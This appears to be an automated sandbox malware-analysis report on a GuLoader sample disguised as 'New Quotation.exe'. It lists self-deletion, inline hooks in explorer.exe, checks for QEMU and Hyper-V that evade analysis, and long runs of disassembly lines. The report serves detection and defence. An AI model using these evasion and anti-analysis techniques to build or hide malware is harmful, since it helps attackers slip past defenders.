      Source: Binary string: wntdll.pdb source: New Quotation.exe, New Quotation.exe, 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49333316862.000000001D443000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49339217288.000000001D5F9000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49639082986.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49633352694.0000000002E44000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.49393683934.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.49187750639.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_710930C0 push eax; ret 1_2_710930EE
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D08CD push ecx; mov dword ptr [esp], ecx7_2_1D7D08D6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031D08CD push ecx; mov dword ptr [esp], ecx17_2_031D08D6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072D4B5 push eax; ret 17_2_0072D508
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072D56C push eax; ret 17_2_0072D572
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072D502 push eax; ret 17_2_0072D508
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072D50B push eax; ret 17_2_0072D572
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00726509 push edx; retf 17_2_0072650A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072670C push esp; iretd 17_2_00726712
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_007277F8 push ebp; iretd 17_2_007277FB
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_007277C6 push ebx; retf 17_2_00727860
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00727811 push ebp; ret 17_2_00727826
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00726907 push ebx; ret 17_2_0072691B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_71091BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71091BFF
      Source: C:\Users\user\Desktop\New Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Self deletion via cmd or bat file
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\New Quotation.exe"
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\New Quotation.exe"Jump to behavior
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xED
      Source: C:\Users\user\Desktop\New Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\New Quotation.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: New Quotation.exe, 00000001.00000002.49393933350.0000000002C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
      Source: New Quotation.exe, 00000001.00000002.49393933350.0000000002C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\New Quotation.exe TID: 4228Thread sleep count: 568 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1648Thread sleep count: 186 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1648Thread sleep time: -372000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 125 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -250000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80FD40 rdtsc 7_2_1D80FD40
      Source: C:\Users\user\Desktop\New Quotation.exeWindow / User API: threadDelayed 568Jump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeAPI coverage: 1.2 %
      Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.9 %
      Source: C:\Users\user\Desktop\New Quotation.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Users\user\Desktop\New Quotation.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeAPI call chain: ExitProcess graph end nodegraph_1-4461
      Source: C:\Users\user\Desktop\New Quotation.exeAPI call chain: ExitProcess graph end nodegraph_1-4308
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: New Quotation.exe, 00000007.00000003.49335937076.0000000001947000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49615366310.0000000001947000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636132043.0000000001947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: explorer.exe, 0000000A.00000000.49427216702.0000000010939000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482708219.0000000010939000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375320607.0000000010939000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWso`t
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: New Quotation.exe, 00000007.00000003.49335937076.0000000001947000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49615366310.0000000001947000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49635663591.0000000001911000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636132043.0000000001947000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49376193528.00000000109F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49428136673.00000000109F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: New Quotation.exe, 00000001.00000002.49393933350.0000000002C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: New Quotation.exe, 00000001.00000002.49394211032.00000000046F9000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: New Quotation.exe, 00000007.00000002.49637406109.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: New Quotation.exe, 00000001.00000002.49393933350.0000000002C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_71091BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71091BFF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80FD40 rdtsc 7_2_1D80FD40
      Source: C:\Users\user\Desktop\New Quotation.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E5D60 mov eax, dword ptr fs:[00000030h]7_2_1D7E5D60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4DA7 mov eax, dword ptr fs:[00000030h]7_2_1D8A4DA7
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D1D50 mov eax, dword ptr fs:[00000030h]7_2_1D7D1D50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D1D50 mov eax, dword ptr fs:[00000030h]7_2_1D7D1D50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDD4D mov eax, dword ptr fs:[00000030h]7_2_1D7EDD4D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDD4D mov eax, dword ptr fs:[00000030h]7_2_1D7EDD4D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDD4D mov eax, dword ptr fs:[00000030h]7_2_1D7EDD4D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C9D46 mov eax, dword ptr fs:[00000030h]7_2_1D7C9D46
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C9D46 mov eax, dword ptr fs:[00000030h]7_2_1D7C9D46
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C9D46 mov ecx, dword ptr fs:[00000030h]7_2_1D7C9D46
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802DBC mov eax, dword ptr fs:[00000030h]7_2_1D802DBC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802DBC mov ecx, dword ptr fs:[00000030h]7_2_1D802DBC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CFD20 mov eax, dword ptr fs:[00000030h]7_2_1D7CFD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88ADD6 mov eax, dword ptr fs:[00000030h]7_2_1D88ADD6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88ADD6 mov eax, dword ptr fs:[00000030h]7_2_1D88ADD6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov ecx, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]7_2_1D7FAD20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89CDEB mov eax, dword ptr fs:[00000030h]7_2_1D89CDEB
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89CDEB mov eax, dword ptr fs:[00000030h]7_2_1D89CDEB
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FCD10 mov eax, dword ptr fs:[00000030h]7_2_1D7FCD10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FCD10 mov ecx, dword ptr fs:[00000030h]7_2_1D7FCD10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]7_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]7_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]7_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]7_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]7_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]7_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]7_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F0D01 mov eax, dword ptr fs:[00000030h]7_2_1D7F0D01
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88BD08 mov eax, dword ptr fs:[00000030h]7_2_1D88BD08
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88BD08 mov eax, dword ptr fs:[00000030h]7_2_1D88BD08
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CEDFA mov eax, dword ptr fs:[00000030h]7_2_1D7CEDFA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D868D0A mov eax, dword ptr fs:[00000030h]7_2_1D868D0A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7DBDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FFDE0 mov eax, dword ptr fs:[00000030h]7_2_1D7FFDE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880D24 mov eax, dword ptr fs:[00000030h]7_2_1D880D24
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880D24 mov eax, dword ptr fs:[00000030h]7_2_1D880D24
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880D24 mov eax, dword ptr fs:[00000030h]7_2_1D880D24
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880D24 mov eax, dword ptr fs:[00000030h]7_2_1D880D24
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C8DCD mov eax, dword ptr fs:[00000030h]7_2_1D7C8DCD
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4D4B mov eax, dword ptr fs:[00000030h]7_2_1D8A4D4B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84CD40 mov eax, dword ptr fs:[00000030h]7_2_1D84CD40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84CD40 mov eax, dword ptr fs:[00000030h]7_2_1D84CD40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D895D43 mov eax, dword ptr fs:[00000030h]7_2_1D895D43
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D895D43 mov eax, dword ptr fs:[00000030h]7_2_1D895D43
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D7DB6 mov eax, dword ptr fs:[00000030h]7_2_1D7D7DB6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CDDB0 mov eax, dword ptr fs:[00000030h]7_2_1D7CDDB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C6DA6 mov eax, dword ptr fs:[00000030h]7_2_1D7C6DA6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851D5E mov eax, dword ptr fs:[00000030h]7_2_1D851D5E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D855D60 mov eax, dword ptr fs:[00000030h]7_2_1D855D60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6D91 mov eax, dword ptr fs:[00000030h]7_2_1D7D6D91
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A5D65 mov eax, dword ptr fs:[00000030h]7_2_1D8A5D65
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BD71 mov eax, dword ptr fs:[00000030h]7_2_1D80BD71
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BD71 mov eax, dword ptr fs:[00000030h]7_2_1D80BD71
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCD8A mov eax, dword ptr fs:[00000030h]7_2_1D7CCD8A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCD8A mov eax, dword ptr fs:[00000030h]7_2_1D7CCD8A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D876D79 mov esi, dword ptr fs:[00000030h]7_2_1D876D79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D0C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D0C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D0C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D0C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D0C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D0C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D8C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D8C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D8C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D8C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]7_2_1D7D8C79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D853C80 mov ecx, dword ptr fs:[00000030h]7_2_1D853C80
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCC68 mov eax, dword ptr fs:[00000030h]7_2_1D7CCC68
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88FC95 mov eax, dword ptr fs:[00000030h]7_2_1D88FC95
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D879C98 mov ecx, dword ptr fs:[00000030h]7_2_1D879C98
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D879C98 mov eax, dword ptr fs:[00000030h]7_2_1D879C98
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D879C98 mov eax, dword ptr fs:[00000030h]7_2_1D879C98
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D879C98 mov eax, dword ptr fs:[00000030h]7_2_1D879C98
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CDC40 mov eax, dword ptr fs:[00000030h]7_2_1D7CDC40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C40 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C40
